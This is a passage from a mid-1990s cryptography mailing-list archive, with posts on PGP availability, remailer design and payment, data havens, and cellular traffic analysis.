cover up would never succeed -- someone would just mail it to the internet, and the story would blow. But the fact is the cover up largely succeeded despite the efforts of the Chief engineer (which got him blacklisted) and despite the theatric efforts of one of the worlds most eminent scientists, perhaps the most eminent living scientist of that time. It makes me realize that the world has already changed, vastly for the better, and those in power do not yet realize it. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we http://nw.com/jamesd/ are. True law derives from this right, not from James A. Donald the arbitrary power of the omnipotent state. jamesd at netcom.com From tjb at acpub.duke.edu Thu Jan 12 23:11:35 1995 From: tjb at acpub.duke.edu (Tom Bryce) Date: Thu, 12 Jan 95 23:11:35 PST Subject: signature business for secure edit release announce Message-ID: I'm not going to waste any more bandwidth sending the announcement (sorry), but here's how you can validate the signature if you'd like to. If you'd like to verify the signature on the announcement for secure edit, please finger me at tjbryce at amherst.edu. In my plan is contained the announcement with a valid signature from Miyako Software's public key. Even though I had "treat source file as text" selected, I think there must have been left over some weird character in there that is not transmitted through email properly. What I did to get the signature to validate was place the announcement in my plan at amherst.edu, finger myself, copy the signed announcement, detach the invalid signature with mac pgp, sign the leftover text and copy just the resulting signature, log back onto amherst, and I edited the plan.txt file, pasting the new signature onto where the old signature used to be. FINALLY WORKED! Sincere apologies for using THREE TIMES the bandwidth the message actually needed, and not even getting it to work at that. Thanks to Bill Evans for checking out the signature and noticing it was invalid. Tom From adam at bwh.harvard.edu Thu Jan 12 23:44:32 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 12 Jan 95 23:44:32 PST Subject: Some PGP problems In-Reply-To: <199501130551.VAA01278@well.sf.ca.us> Message-ID: <199501130743.CAA24613@bwh.harvard.edu> There are two versions of MacPGP that use RSAREF, and are thus legal & kosher, plus Viacrypts. The free ones are MIT, and 2.6.2ca. The MIT one doesn't support Apple Events. The Apple event supporting PGP's can be driven by a menu interface called the MacPGP kit. 2.3 is not fully compatible with 2.6; I use 2.6.2 with the kit. MIT: telnet net-dist.mit.edu, login as getpgp server.netcom.com:/pub/gr/grady/PGP/MacPGP262b1.2.sea.hqx.asc) duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPKit.hqx You were supposed to use gunzip (GNU's unzip) to unzip, but Stufit deluxe will handle it; just tell Stuffit its a zipped file. Crunch asked: | I learn that Mac PGP2.3 exists, but NO version 2.6 | exists for the Mac. Is that true? If not, then | where can I get a copy, so I can decode a message | created with 2.6? If ver 2.3 will decode a message | encoded with 2.6, then I'm faced with how I can | extract this Mac file which has a .gz extension. | Binhex don't seem to decode it. So, I now got this | file named "macpgp2.3.cpt.hqx.gz" on my Mac. Was | I supposed to have used some special UNIX itility to | convert the .gz thingie first? Please emlighten | this confused cypherpunker!!! :-) Or will I even have | to do all of this because 2.3 is incompatable with 2.6. -- "It is seldom that liberty of any kind is lost all at once." -Hume From root at nesta.pr.mcs.net Fri Jan 13 00:02:25 1995 From: root at nesta.pr.mcs.net (Nesta Stubbs) Date: Fri, 13 Jan 95 00:02:25 PST Subject: Data Havens..A consumer perspective In-Reply-To: <199501121637.IAA00893@largo.remailer.net> Message-ID: On Thu, 12 Jan 1995, Eric Hughes wrote: > why would you give the haven owner free run? I mean naturally he does > have free run with your data once he gets it, > > That's exactly the reason, namely, to make the agreement between > individuals match the underlying nature of information. This is > different in the trust in silence about the user. This is also not to > say that the operator can't undertake to make assurances about where > bits go and don't go. > are you saying that there is an agreement between the data haven operator and the user? If so, that's one of the things i was attmeting to point out in that reply. I think the agreement, wether it is a contract, not likely, or a sense of trust is extremely important to the data-haven. > I am sure you > woudln't want your data stored ona public access Unix system, or in > plaintext. > > So don't store it in plaintext. The operator of the data storage > facility has no responsibility for this. > Right now were are getting into so many fraggin different definitions of data haven, that this conversation is loopng over itself infinetly. In one sort of data Haven, the operator does have a responsibility to keep the data private, yet on another, he doesn't have th responsibility, it all depends on what the aims and views and golas of the DataHaven are. And since we have not yet agreed on what a data Haven.....we get usenet run-around. > if the datahaven is turned into a data broker > > I don't know about you, but I don't like paying money for random bits. > this is ties into the above line, maybe you arent just sending encrypted data, maybe your selling secrets to a datahaven operator, who is offshore, or who has the money ot pay you know, and also the structre set up to recieve, transmit, and take payment and pay for that secret data, or valuable info. Once again I think that we are working with multiple definitions of DataHaven here, adn it is leading to confusions. > well what would be thepurpose of this data haven you propose except as a > extra storage pace for data, like if you dont have space on your own > drive? > > Even when you've got enough of your own disk space, it's still subject > to failure. Putting data in multiple places reduces the possibility > of unrecoverable catastrophe. > ther are already services much better equipped to deal with this problem, although, I am unsure if any of them are crypto-aware as of yet. Osmthig to look into. From skaplin at mirage.skypoint.com Fri Jan 13 00:04:29 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Fri, 13 Jan 95 00:04:29 PST Subject: Remailer@jpunix.com down!!!??? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I just read that the remailer at jpunix.com went down suddenly and permanently. Anyone know what happened?? I also believe the whole site is down as it didn't answer my pings a couple of days ago. Sam - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== A man without a God is like a fish without a bicycle. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLxYycclnXxBRSgfNAQFh8wf9HR9KCppQV5Li70ggDPQ0hTEuUU6Cl3BS m0N4Mx/6bu3OWIyh5XkpBfNSNhvixkSR7UJ2LtqugXAxsfYiYQw+uw2vd1i3rK8k VYuqWYgWh8uu+xNIoTXN7MdosuGoG/+eglVWW5SuZNxpVO5ggVq7KqDjTTtHjpSC TPBwJbSELoMIQbcFfvbA5EgaMVqdVbf1xXxUVLIguh0AreX75gPMPVPzwS9+xOMs BgB/UgsC+XGWYhCH7EjiAF0tPE+MBRkVkQVfCEo1Hk9CrafMUHYIWPzwu/sirq3v vhoZxurEYA6Fr2sbCOtlPGXKv3UAELmU+h7b+vO4CKu6OCn1XhgZmg== =uFxE -----END PGP SIGNATURE----- From root at nesta.pr.mcs.net Fri Jan 13 00:13:56 1995 From: root at nesta.pr.mcs.net (Nesta Stubbs) Date: Fri, 13 Jan 95 00:13:56 PST Subject: Data Havens..A consumer perspective In-Reply-To: Message-ID: On Thu, 12 Jan 1995, Jonathan Rochkind wrote: > At 4:30 AM 01/12/95, Nesta Stubbs wrote: > You shouldn't ever give the operator the info in plaintext. Encrypt it, > public or otherwise, and distribute the key to your Band of Merry Men. > Then it doesn't matter even it's sitting on a public access Unix system, no > one can read it anyhow. The main point of this kind of data haven seems to > be providing you a remote location to store your data, in an anonymous way, > so even if it does end up being found out, you can't be linked to it. I > wouldn't trust the operator to do anything particular with the data other > then keep it safe enough so I can retrieve it later, and I'd take the > neccesary precautions to account for that lack of trust. The only reason > I'd trust him to even keep it safe for me, is because of reputation market. > If he routinely loses people's data, word is going to get around. On the > other hand, if he routinely shows people's data to the FBI, no one is even > going to know about it. I don't trust him not to routinely show the data to > the FBI, or store it in public. Use encryption. > first note that in carol ann's post she previously said it doesn't matter to her how the data is transported, and thus it could be in paintext, I made. and also that she said that the operator should be able to specify how it was transmitted. once again we're running with different definitions of data haven. I see the ata haven as more than just aplace to safely store data if it's encrypted, I see it capabel of alot of other things, like acting as a central point to BlackNet type operation, with the proper structure set up to carry out the transactions with safety, or relative safety. also, as a anonymous drop box type of place, I can then send my encrypted data to the data haven, and let them hold it until some anonymous client or eployer and I complete an agreed upon contract and both give word to the data haven to complete it's aprt of the contract, wether it is allowing the other person to now access that encrypted information, or doing a monetary transaction with net-cash or whatever. Also, as a data base of illegl information, like old credit records and such. > Of course there are different purposes for data havens, which would require > more trust of the operator. But I'm not sure how well those are ever going > to work, because I'd much rather trust my encryption then trust the > operator. > agreed. there are also other operations besides data storage that can be protected by your own crypto, and only use the data haven as a mid-point. argh, I'm sorry fo the poor typing in this letter, and the other one i sent to Eric ont his subject, it's really late and I am dogged, just got done 9 hours of work. BUt this topic is so interesting for me I couldnt resist. Tommorow if I get a chance I will atttempt to outline what *I* think of when I am saying data haven, maybe it will help us be more productive, not that we arent doing that now... From jsled at eis.calstate.edu Fri Jan 13 00:25:06 1995 From: jsled at eis.calstate.edu (Joshua M. Sled) Date: Fri, 13 Jan 95 00:25:06 PST Subject: Remailer@jpunix.com down!!!??? In-Reply-To: Message-ID: On Fri, 13 Jan 1995, Samuel Kaplin wrote: > I just read that the remailer at jpunix.com went down suddenly and > permanently. Anyone know what happened?? I also believe the whole site is > down as it didn't answer my pings a couple of days ago. He was getting spam from AOL at the rate of 25 messages every 5 seconds... so he took the system down. Joshua M. Sled From lcottrell at popmail.ucsd.edu Fri Jan 13 00:53:06 1995 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Fri, 13 Jan 95 00:53:06 PST Subject: for-pay remailers and FV Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Pierre Uszynski writes: >Doug Barnes said: >Same here, but from the other tack: "Remailer Guild??? Give me a >break :-)" My problem with the idea of "Guild" (or any quasi >general agreement) of remailer operators is that: > >On the one side: >- The whole idea of a using a remailer chain comes from distrust of >the operators. The operators should be the ones to distrust each other >the most. I agree. There should be minimal cooperation between remailer operators. They should work together on standards and policies to ensure the free flow of messages. They should not be afforded an oportunity to conspire. >Pierre. >pierre at shell.portal.com Observation: Most complaints to remailers come from news posts. Only a small fraction from direct mail. (Is this the experience of the other operators?) Suggestion: Pay the first and last remailers in the chain. The first remailer knows who you are. You simply purchase an account from him. He provides support and user friendly utilities... Block all posts from normal remailers. News posts only allowed from pseudonym servers like omega.c2.org. The user uses e-cash, or greenbacks in an envelope, to buy an account on the nym server. All email from other remailers, and to any address is free. Thoughts? -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLxOHzVVkk3dax7hlAQGnfQP9HJG+O/L/+L9hGqZ6xYqfmJh30Kwli7r6 BTEck7NwJ1W3gk6IpLy+NG4l/v8HCEyWvQGHYsGcBJkl+y6i2otb8Y6Bec25xntZ KlfwNi6UON5rpnP8+EFolcolfb9OpEIMhfirzu07jVkM72mUBp7IAzFZjZ2NTUY+ oLDCa0V2EWg= =0TTW -----END PGP SIGNATURE----- -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From lcottrell at popmail.ucsd.edu Fri Jan 13 00:53:11 1995 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Fri, 13 Jan 95 00:53:11 PST Subject: Remailer postage Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >jpb at gate.net wrote: >> Where can I get the Magic Money software? > >I'm a bit behind, so sorry if others have already suggested this, but >you should need any digicash for this... stamps can be just big random >numbers. Someone buys a books of stamps, you make 10 big random >numbers send them a copy and keep a copy on file. After a message >comes through with a particular number you throw that number out. > >Just like real stamps, and unlike money, they can be used only once. However I now can recognize which messages are yours. If I work with another operator, I can eliminate all the remailers between us for purposes of traffic analysis. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLxOPhFVkk3dax7hlAQEy7AP+NZOV8cZ94VfInTy5RHKasPOxrmBzcy9k Bc1nqyK95ae4mr+XWNBBpqjL4FQBwTpnSVI+eVAnTd9QWK9XND3YN8M9PdzzM8zF qdrB4I7aB29AJsenQWD1zujZDNLwMaaRxDYe47xR5vD+o7LIUMHxBvveLllp0pAM Ek2wjwQhezI= =PsFM -----END PGP SIGNATURE----- -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From lcottrell at popmail.ucsd.edu Fri Jan 13 00:54:17 1995 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Fri, 13 Jan 95 00:54:17 PST Subject: Remailer source Message-ID: >Octavian Ureche wrote: > >> Does anybody know where could I find UNIX sources >> for a remailer ? > Try mixmaster. I can not post the path for export reasons. Mail me if you want it. It runs on Sparc. Does not run on Linux and FreeBSD. All others unknown. -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From HALVORK at sofus.hiof.no Fri Jan 13 01:46:23 1995 From: HALVORK at sofus.hiof.no (Halvor Kise jr.) Date: Fri, 13 Jan 95 01:46:23 PST Subject: Some PGP problems Message-ID: <14DAA230C3F@sofus.hiof.no> Hello! I have send an reply to C. Crunch. I enclosed the "Where to get the latest PGP"-FAQ - Halvor. >Hi, > >I'm trying to decode a PGP file that was created with Ver 2.6. >At this time, I thought that my older ver 2.1c (Running on a >Mac) would at least be able to decrypt something made from >a higher version, running on a PC. Apparently that is not so. > >So, the next thing I did, or what any self respecting >Cypherpunk might so, is to go out on the net and look >for a later version to FTP> Well, after discovering >that soda.berkeley.edu don't exist anymore, I eventually >found the ftp site where it lives. ftp.csua.berkeley.edu. > >I learn that Mac PGP2.3 exists, but NO version 2.6 >exists for the Mac. Is that true? If not, then >where can I get a copy, so I can decode a message >created with 2.6? If ver 2.3 will decode a message >encoded with 2.6, then I'm faced with how I can >extract this Mac file which has a .gz extension. >Binhex don't seem to decode it. So, I now got this >file named "macpgp2.3.cpt.hqx.gz" on my Mac. Was >I supposed to have used some special UNIX itility to >convert the .gz thingie first? Please emlighten >this confused cypherpunker!!! :-) Or will I even have >to do all of this because 2.3 is incompatable with 2.6. > >C. Crunch -- * MEMENTO MORI * _____________________________________________________ | Halvor Kise jr. * Halvor.Kise.jr at hiof.no | | * halvork at sofus.hiof.no | | Ostfold * halvork at frodo.hiof.no | | Regional College * Student at | | N-1757 Halden * Computer Science | | * | | | | Finger halvork at sofus for PGP-key | ----------------------------------------------------- From jrt at asiaonline.net Fri Jan 13 03:06:37 1995 From: jrt at asiaonline.net (jRT) Date: Fri, 13 Jan 95 03:06:37 PST Subject: Reefer madness In-Reply-To: <9501122229.AA13951@netmail2.microsoft.com> Message-ID: On Thu, 12 Jan 1995, Blanc Weber wrote: > From: Sandy Sandfort > > Ever seen a Turkish prison film, Reuben? > ......................................................... > > I don't get it. (I haven't seen one) > > Blanc > "Have you ever seen a grown man naked?", I think that's how they put it in Airplane - Flying High, the movie from the early 80s I think, before going on with the Turkish prison bit. Basically there is a lot of sex between the men in jails there, and mostly unwanted but forced. Regds PS if you get really stuck, you could ask your folks. From Andreas.Elbert at gmd.de Fri Jan 13 03:11:57 1995 From: Andreas.Elbert at gmd.de (Andreas Elbert) Date: Fri, 13 Jan 95 03:11:57 PST Subject: "safe" Internet access Message-ID: sorry to correct you, but the 900 MHz licensefree radios, the cellular radios (analog and digital) and Modacom and Mobitex are all different animals. i don't want to go into details though, because it doesn't change your main point, the ability to localize one of these radios while transmitting. Andreas From hroller at metronet.com Fri Jan 13 05:23:39 1995 From: hroller at metronet.com (Michael L. Acklin) Date: Fri, 13 Jan 95 05:23:39 PST Subject: PGP and Windows Message-ID: Mark, I saw your message on Cypherpunks List and noticed that you were using WinEudora. My question is do you know of a program that will do encryption with PGP on the fly within Windows. I know how to encrypt a file and attach it to a message. And I have both WinPGP 2.6 and WinPGP 1.0. Both only encrypt files. Any help would greatly be appreciated. Thanks in Advance.... Mike Acklin ---------------> hroller at metronet.com Pub Key available at MIT Key Server. From joelm at eskimo.com Fri Jan 13 06:12:09 1995 From: joelm at eskimo.com (Joel McNamara) Date: Fri, 13 Jan 95 06:12:09 PST Subject: Windows Eudora PGP/remailer add-on Message-ID: <199501131412.AA12078@mail.eskimo.com> I'm working on a pre-mailer/PGP shell that works with Eudora for Windows. You compose the mail in the shell, encrypt it, specify remailer(s), and it transfers the message back to Eudora. It's called Private Idaho. Anonymous FTP from ftp.eskimo.com /joelm/pidaho11.zip. There were some problems with the loading routine in version 1.0, but hopefully I've fixed them in this version. Any comments, requests, bug reports appreciated. Joel McNamara joelm at eskimo.com - finger for PGP key From an158409 at anon.penet.fi Fri Jan 13 06:12:50 1995 From: an158409 at anon.penet.fi (beacher) Date: Fri, 13 Jan 95 06:12:50 PST Subject: telecommunications reform again Message-ID: <9501131259.AA05870@anon.penet.fi> Telecom Legislative Effort Opens WASHINGTON, D.C., U.S.A., 1995 JAN 12 (NB) -- The Herculean task rewriting the nation's telecommunications law, an effort that failed in the 103rd Congress, has begun in Washington. The Senate Commerce Committee opened the action this week with a hearing on general concepts of communications reform. The last time Congress successfully addressed the communications needs of the nation was 50 years ago, with the 1934 Communications Act. The new Republican Congress is expected to support deregulation and competition in the provision of telecommunications services. But so do most Democrats, and the devil will be in the legislative details, as the various forces in the marketplace seek to use legislative language to secure competitive advantages. Sen. Larry Pressler (R-SD), chairman of the committee, predicted that his panel will report a bill by July 4. Rep. Jack Fields (R-Texas), who heads the House telecommunications subcommittee, said his group will approve a bill by Easter. But neither legislator has yet to introduce a bill, so experts are unable to predict where the inevitable fights will occur and on whose turf. "Let's pick a starting date -- January 1, 1996 or 1997 -- and say, 'Gentleman, start your engines. We're going to have a race and let the best man win,'" said Sen. Bob Packwood (R-Ore.) at the hearing. As the opening bell was ringing in the Senate, Vice President Al Gore was trying to gin up support for the administration's views on telecommunications at a meeting of state regulators and local government officials. "Competition in the information marketplace will provide Americans with lower prices for their telephones, cable and information goods and services and give them more and better choices," Gore said. The White House estimates that competition in telecommunications will also create 1.4 million new jobs over the next 10 years. The contending forces were also getting organized. The seven regional Bell operating companies announced that Gary McBee, former chairman of the United States Telephone Association, will head their lobbying efforts in the new Congress. The Baby Bells support opening all markets to immediate competition. "It's time to open all markets to all competitors, under the same conditions and at the same time," McBee said. "That will mean lower prices, more choices and better service for everyone." McBee's coalition will be called the Alliance for Competitive Communications. (Kennedy Maize/19950111/Press Contact: Bill McCloskey, ACA, 202-463-4129) ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From perry at jpunix.com Fri Jan 13 07:06:19 1995 From: perry at jpunix.com (John A. Perry) Date: Fri, 13 Jan 95 07:06:19 PST Subject: Remailer@jpunix.com down!!!??? In-Reply-To: Message-ID: <199501131505.JAA05109@jpunix.com> A non-text attachment was scrubbed... Name: not available Type: text/x-pgp Size: 1205 bytes Desc: not available URL: From asgaard at sos.sll.se Fri Jan 13 07:36:05 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Fri, 13 Jan 95 07:36:05 PST Subject: Cellular and Crime Message-ID: There is this criminal trial going on in Stockholm concerning a group of suspects that entered a bank vault through the roof over a weekend in 1992. They have been prime suspects for a long time but evidently it has taken a lot of time to build up a case against them. Traffic analysis (but not tapping of the actual conversations, GSM? - no mention of the system in the news stories) plays a substantial role in the prosecution. 'A and B were at X at the same time','B and C were in the vicinity of the Bank at this time' etc. The suspects have not tried to argue that their cellulars were on loan to some stray persons. We all know that a booted cellular is a wonderful Area Locator. (I wonder if the suspects new?) But I have (naively) been thinking that the authorities needed prior suspicion using this feature in 'real time'. Judging from what has been written about this trial the police must have requested, and received, logged traffic data quite some time afterwards. Perhaps they log it for ever? Mats From tedwards at src.umd.edu Fri Jan 13 09:17:11 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Fri, 13 Jan 95 09:17:11 PST Subject: "safe" Internet access In-Reply-To: Message-ID: On Fri, 13 Jan 1995, Andreas Elbert wrote: > sorry to correct you, but the 900 MHz licensefree radios, the cellular > radios (analog and digital) and Modacom and Mobitex are all different > animals. > i don't want to go into details though, because it doesn't change your main > point, the ability to localize one of these radios while transmitting. However, if there are a large number of 900 MHz radio modems operating in a cryptographically secure spread-spectrum method, it may be very difficult to locate your particular transmitter...however the modem you are talking to will know your pseudonoise sequence, and a receiver that knows this will have a much easier time tracking you down. -Thomas From hayden at krypton.mankato.msus.edu Fri Jan 13 09:31:26 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Fri, 13 Jan 95 09:31:26 PST Subject: Dangerous Web Site Message-ID: I was net-surfing and I came across the following site: http://www.satelnet.org/ They do credit checks of any person, SS# ID's, national database searches, etc of any person or business (for a small fee). Gee, don't I feel like little brother now. ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> I am Pentium of Borg \/ Finger for PGP Public Key <=> you will be approximated From eric at remailer.net Fri Jan 13 09:48:25 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 09:48:25 PST Subject: How do I know if its encrypted? In-Reply-To: <199501122233.OAA02325@ix3.ix.netcom.com> Message-ID: <199501131746.JAA02913@largo.remailer.net> From: daleh at ix.netcom.com (Dale Harrison (AEGIS)) Paco begins by inventing the new [format] of which only Paco knows the internals. Fine. The operator has no idea of how to make sense of this data format. Just because someone in the world has an interpretation for it doesn't mean that I do. No operator of any data service can be expected to know about every data interpretation. The key here is "good faith". An operator can undertake a good faith effort to remain ignorant about content. The argument that "it passed the filter, so it's approved" is bogus. The counter is that "it passed the filter, so I personally have no idea what's inside it." Knowledge here is personal specific knowledge, not an acknowledgement of a possibility. Eric From eric at remailer.net Fri Jan 13 09:51:59 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 09:51:59 PST Subject: Microsoft TrueName (tm) (fwd) In-Reply-To: Message-ID: <199501131750.JAA02922@largo.remailer.net> From: rah at shipwright.com (Robert Hettinga) Eric, what'll you take for "remailer.net"? ;-). Addresses under remailer.net will be available to operators of approved remailers. Approved is yet to be defined, so no one could possibly satisfy the conditions for it yet. In the meanwhile, I'm using as a vanity license plate. Eric From eric at remailer.net Fri Jan 13 09:54:19 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 09:54:19 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: <199501131752.JAA02925@largo.remailer.net> From: Ben.Goren at asu.edu Here's a solution: What problem, pray tell, does this solve? It seems far more complicated than it need be. Alice sends a file to Dave's DataHaven. When Alice wants her file back, she sends to Dave a secure hash of the file, a key with which to decrypt it, and a handful of plaintext at the beginning of the file. Dave decrypts the file that matches the hash with the key Alice gave him; if the file begins as Alice says it should, Dave returns the file to Alice. Eric From eric at remailer.net Fri Jan 13 10:02:18 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 10:02:18 PST Subject: How do I know if its encrypted? In-Reply-To: <9501130137.AA03281@eri.erinet.com> Message-ID: <199501131800.KAA02934@largo.remailer.net> At 10:08 PM 1/11/95 -0800, Eric Hughes wrote: > ... Seems to me that a quite reasonable condition of use of a remailer is >that what is passed isn't human readable. From: pstemari at erinet.com (Paul J. Ste. Marie) Perhaps I missed this, but why? If someone is going to plant kiddie porn or whatever on you, does it really matter if they encrypt it first or not? If you can't read it, it's not kiddie-porn *for you*, although it might be for someone with the key. Encryption fragments meaning subjectively. A magazine, for example, has a fixed center of meaning for all who can read the language. A magazine looks the same to all who look at it. An encrypted file looks different to those who have the key from those who do not. Encrypted data is fundamentally different from paper-and-ink data in this way. The metaphor of "planting it on somebody" does not apply to data that the "somebody" can't read. I forget the name of the cypher (Vigere, perhaps--the one that uses a series of Caesar-like cyphers keyed by a password), but you could just run it through that with a password of abcdefghijklmnopqrstuvwxyz and you'd flatten out the distribution enough to get it by casual inspection. Fine. It think that would suffice. If you can't easily read it, you can't be expected to have read it. The operator of a data service has _zero_ motivation to cryptanalyze something. If they happen to apply a viewer to the file (for whatever reason), they don't _want_ to see what's inside. Eric From eric at remailer.net Fri Jan 13 10:09:41 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 10:09:41 PST Subject: essential characteristics of a Data Haven In-Reply-To: Message-ID: <199501131807.KAA02940@largo.remailer.net> From: Adam Feuer what differentiates a "data haven" from "reasonably secure offsite storage"? Right now, that's easy. Data havens don't exist, and prototype code for reasonably secure off-site storage does. The key distinguishing feature of off-site storage is that it stores data only as bits, structured and segmented, but not interpreted _as_ anything but bits. A data haven, on the other hand, holds things that someone disapproves of, otherwise there's no need for a haven. _A fortiori_, if someone disapproves of it, it must mean something. Raw bits don't mean anything, or rather, they can mean everything. Eric From eric at remailer.net Fri Jan 13 10:14:13 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 10:14:13 PST Subject: Anonymous payment scheme In-Reply-To: <199501130333.QAA03633@akeake.its.vuw.ac.nz> Message-ID: <199501131811.KAA02946@largo.remailer.net> From: Paul Foley NZ Telecom are conducting an experiment with using phonecards in softdrink vending machines. There was an article in The Dominion newspaper's _InfoTech_ magazine crying out for the Government to stop it, claiming Telecom's creating an independant (from the Reserve Bank) currency, will destroy the New Zealand economy, etc., etc. Sounds like your basic central banking ignorance. Look folks, just so y'all don't look like idiots, remember this: A means of payment is not the same thing as a currency. Eric From ddt at lsd.com Fri Jan 13 10:24:16 1995 From: ddt at lsd.com (Dave Del Torto) Date: Fri, 13 Jan 95 10:24:16 PST Subject: Pgp where? Message-ID: At 6:52 am 1/12/95, kevin.rock at njackn.com wrote: >I think this is the correct board to put this message on, but since there are >no messages to read here I might be wrong. Does anyone know where to locate >the program (algorithm) Pretty Good Protection (PGP) ? I've read about it in >the local newspaper, in Scientific American and in the alternate news message >area. It sounds like a good encryption scheme and I would like to explore >>it's possibilities. Thanks for any assistance. Kevin, FYI, I keep the most recent version of Mike Johnson's excellent guide on where to find PGP in: ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/where_is_pgp?.txt This is a plain text file, but (for Mac users) the file: ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/where_is_pgp?.txt.sea.bin is a self-expanding Mac archive (faster transfer time). There're some other informational files in that dir, and any cpunks who know of a quintessential PGP info file is encouraged to let me know so I can post it there. Remember, this "archive" is oriented toward new PGP users who need friendly information on why/how/who/where/when etc. If you're in the US or Canada, you can also find the most up-to-date version of the MacPGP application in this directory: ftp.netcom.com:/pub/dd/ddt/crypto/NOT_FOR_EXPORT Be sure to read the ReadMe files detailing the export restrictions, since transfer of this software to a system or machine outside of the US or Canada is strictly verboten. Send email to if you have further questions. dave ______________________________________________ "Civil Liberty Through Simple Cryptography." From chen at intuit.com Fri Jan 13 11:00:30 1995 From: chen at intuit.com (Mark Chen) Date: Fri, 13 Jan 95 11:00:30 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: <9501131859.AA09568@doom> If anyone is interested, I have a complete "FOIA Kit," issued by the Fund for Open Information and Accountability, Inc. It includes instructions, advice, and an assortment of sample letters. E-mail me if you would like a copy. -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From eric at remailer.net Fri Jan 13 11:14:22 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 11:14:22 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: <199501131912.LAA02985@largo.remailer.net> From: lce at wwa.com (Larry E) The goal is to convince the two groups of concerned parties[, in short, users & lawyers,] that the remailer operators don't know the contents of what's passing through their remailers: This is exactly right. With a sealed box which you can't look in at all, this is easy. Providing an assurance on a general purpose computer is more difficult. And yes, it _is_ always possible to simulate a filter that's not a filter, blah, blah, blah. We are in the realm of social interactions here, not in the realm of technology. The remailers are operated by people who want to promote information flow, not restrict it. They provide an important service that is of critical importance to some people and groups who use the net. They shouldn't be held accountable for the few who abuse the remailers, and encryption helps prevent that from happening. I agree with this argument. It is the germ of discourse about the public policy of remailers and anonymity generally. I want to point out the rhetorical content of this statement, though, more than my agreement with it. The cypherpunks list is filled with paranoid nay-sayers who can't distinguish their own paranoia from a legitimate technological failing. I feel a dire need for a positive rhetoric of cryptography. I want to be 'for' something and to know what it's good for rather than to be against everything that doesn't meet my personal desires. How many times have I seen particular solution whose response is "But I want more, and this won't work for that"! The most self-deceptive say "It can't be done", the slightly more honest say "You can't do it", and none say "I will not do it". So now all you people who think that remailers don't work, don't run one. Good, I see most of you are already complying with this directive. Even the simplest remailer has utility. If there were no utility, then nobody would use them (duh). It is not only foolishness and idiocy but also mendaciousness to say that "remailers just don't work". It is constructive to say, however, that "the current remailers don't work against the following opponent", but this is not usually the case. Rather, the speaker's paranoia silently projects their own requirements onto a technical discussion, leaving only confusion. Look at the recent conversation over postage for remailers. Paraphrasing: "Credit cards won't work because they're not anonymous". My response: "Bullshit". Using a credit card as a means of payment does put constraints on usage, but it doesn't prevent usage (duh redux). What credit card payment does do is to require more effort in order to link email transactions. This is an unalloyed good, but pure silver instead of gold. There are better ways, one of them First Virtual, which at the least has counterparty anonymity; another, blind sigs (as yet unusable for payments). The implicit assumption here is that "If I can't use it to smash the state, it's worthless". Well, thank you very much for constraining my ability for privacy with your political agenda. And I have a hint for all the state-smashing wannabe-businesspeople out there: the ones who have a business (less secure) now will eat your lunch for the business (more secure) later. To be dry and academic about this, I'd say that the problem was an insufficiency in threat modelling. But that just doesn't 